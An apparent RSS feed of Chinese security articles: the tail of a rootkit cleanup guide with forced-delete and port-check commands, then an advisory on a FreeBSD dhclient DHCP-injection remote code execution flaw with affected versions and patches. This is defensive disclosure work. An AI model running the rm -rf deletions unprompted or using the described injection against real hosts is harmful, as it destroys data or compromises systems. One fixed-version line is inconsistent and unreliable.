style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 5. 清除恶意文件</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rm</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-rf</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /etc/ad12e85f/</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rm</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-f</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /usr/share/terminfo/w/wy66-qa</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">...</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 6. 恢复系统配置</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 检查 /etc/sysctl.conf 是否被篡改</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 检查 ulimit 设置</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 7. 查找并停止 SS5 进程:</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># rootkit 可能隐藏进程, 检查网络连接</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">netstat </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-tlnp</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> | </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">grep</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> &lt;unknown_listen_port&gt;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">ss </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-tlnp</span></span></p></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7c0bbcec&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525577%26idx%3D2%26sn%3Df77ac8f1303ea4b3e5b5dc78b8881b71">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 12 May 2026 19:51:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】FreeBSD dhclient 远程代码执行(CVE-2026-42511)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525551&amp;idx=1&amp;sn=e0910e9cbc4926fc58dc4fca4045af92</link>
      <description>2026年5月9日，深瞳漏洞实验室监测到一则FreeBSD组件存在命令执行漏洞的信息，漏洞编号：CVE-2026-42511，漏洞威胁等级：高危。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-05-09 18:17</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=35c0e266&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FAPc6NwjLsxQD3qDXdFiaIcuFKuXiaApEHnicY5KvogSgicTkdCPyPGSaJbRtqD3KSZF5S6kiaYyppknodv0HDnibnVGuwjx1b0JKcMzb1nRSjTxeQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年5月9日，深瞳漏洞实验室监测到一则FreeBSD组件存在命令执行漏洞的信息，漏洞编号：CVE-2026-42511，漏洞威胁等级：高危。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041898" src="https://wechat2rss.xlab.app/img-proxy/?k=1246333f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxR2NSozyXMADZnDePny0j48R0slDicCYTee4icoxQYZWFutGd4QkoqGEA3RmszkAKNcpdxVAaGBINd8DSiaCCIYcbNIMibNqSvTOG0%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FreeBSD dhclient 远程代码执行(CVE-2026-42511)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FreeBSD</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FreeBSD 13.5.* &lt; 13.5-RELEASE-p13</span><span leaf=""><br/></span><span leaf="">FreeBSD 14.3.* &lt; 14.3-RELEASE-p12</span><span leaf=""><br/></span><span leaf="">FreeBSD 14.4.* &lt; 14.4-RELEASE-p3</span><span leaf=""><br/></span><span leaf="">FreeBSD 15.0.* &lt; 15.0-RELEASE-p7</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">命令执行</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：无需用户认证</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：需要位于同一广播域并响应 DHCP 请求</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：远程</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：中等，需要同广播域 DHCP 投毒。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：高危，成功后可导致 root 权限远程代码执行。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041894" src="https://wechat2rss.xlab.app/img-proxy/?k=a8d90743&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSCKeCdtDSib3ibovIDBfJS9kl07hdlQJyl9yPPJZPcn5wB73vh2ibOHGD95WKDbUPFqco2qBgicGLeRTc2kEVbmVz5V4XDia3ktOBw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FreeBSD 是一个免费、开源的类 Unix 操作系统，以卓越的稳定性、高性能、先进的网络功能、原生 ZFS 文件系统以及轻量级 Jail 容器虚拟化技术而闻名，广泛用于服务器、网络存储和嵌入式设备。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041896" src="https://wechat2rss.xlab.app/img-proxy/?k=9d4e3aae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTTB4NibGXHNF94GiaxCPiaRcJbOlfAOvWgA5kCZMGc8yJyBz2zA4e6cv6zyHNyRfFJgxf4Xf1hXicWDvvbJ7DrQ33med3FcAx1zIc%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年5月9日，深瞳漏洞实验室监测到一则FreeBSD组件存在命令执行漏洞的信息，漏洞编号：CVE-2026-42511，漏洞威胁等级：高危。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">该漏洞源于写入 BOOTP file 字段到租约文件时未转义双引号，攻击者可通过恶意 DHCP 响应注入配置指令。当 dhclient 重新解析租约文件时，恶意指令会被 root 权限运行的 dhclient-script 脚本执行</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">，攻击者只需与目标处于同一广播域并架设恶意DHCP服务器，即可实现远程代码执行并完全控制目标系统。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前受影响的FreeBSD版本：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FreeBSD 13.5.* &lt; 13.5-RELEASE-p13</span><span leaf=""><br/></span><span leaf="">FreeBSD 14.3.* &lt; 14.3-RELEASE-p12</span><span leaf=""><br/></span><span leaf="">FreeBSD 14.4.* &lt; 14.4-RELEASE-p3</span><span leaf=""><br/></span><span leaf="">FreeBSD 15.0.* &lt; 15.0-RELEASE-p7</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041897" src="https://wechat2rss.xlab.app/img-proxy/?k=19f29091&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxQgXaqn4KAsqiaPGsiacickVAyrPSouDY4iaYjGGyZGyzpbv1HTLnD5GQhf5VQbbLIAoghjv8ibRjB9ZIY7gFKqaibEaTNZOFCKHDNAY%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布安全补丁，请及时将系统更新至以下修复后的版本或更高版本：</span><span leaf=""><br/></span><span leaf="">FreeBSD 13.5.* ≥ 13.5-RELEASE-p13</span><span leaf=""><br/></span><span leaf="">FreeBSD 14.2.* ≥ 14.3-RELEASE-p12</span><span leaf=""><br/></span><span leaf="">FreeBSD 14.4.* ≥ 14.4-RELEASE-p3</span><span leaf=""><br/></span><span leaf="">FreeBSD 15.0.* ≥ 15.0-RELEASE-p7</span><span leaf=""><br/></span><span leaf="">下载地址：</span><span leaf=""><br/></span><span leaf=""><a href="https://www.freebsd.org/security/advisories/FreeBSD-SA-26:12.dhclient.asc" target="_blank">https://www.freebsd.org/security/advisories/FreeBSD-SA-26:12.dhclient.asc</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041895" src="https://wechat2rss.xlab.app/img-proxy/?k=3395fea0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxRlEmDV5bf603QHOJIObr0BPwNG7cE6Qkc6PllKNcrsxkUHq3n99etibjVFrSgdhwa3X7t7I8Htmg1PRRZQZ7BnE7paQhAwfRXk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span 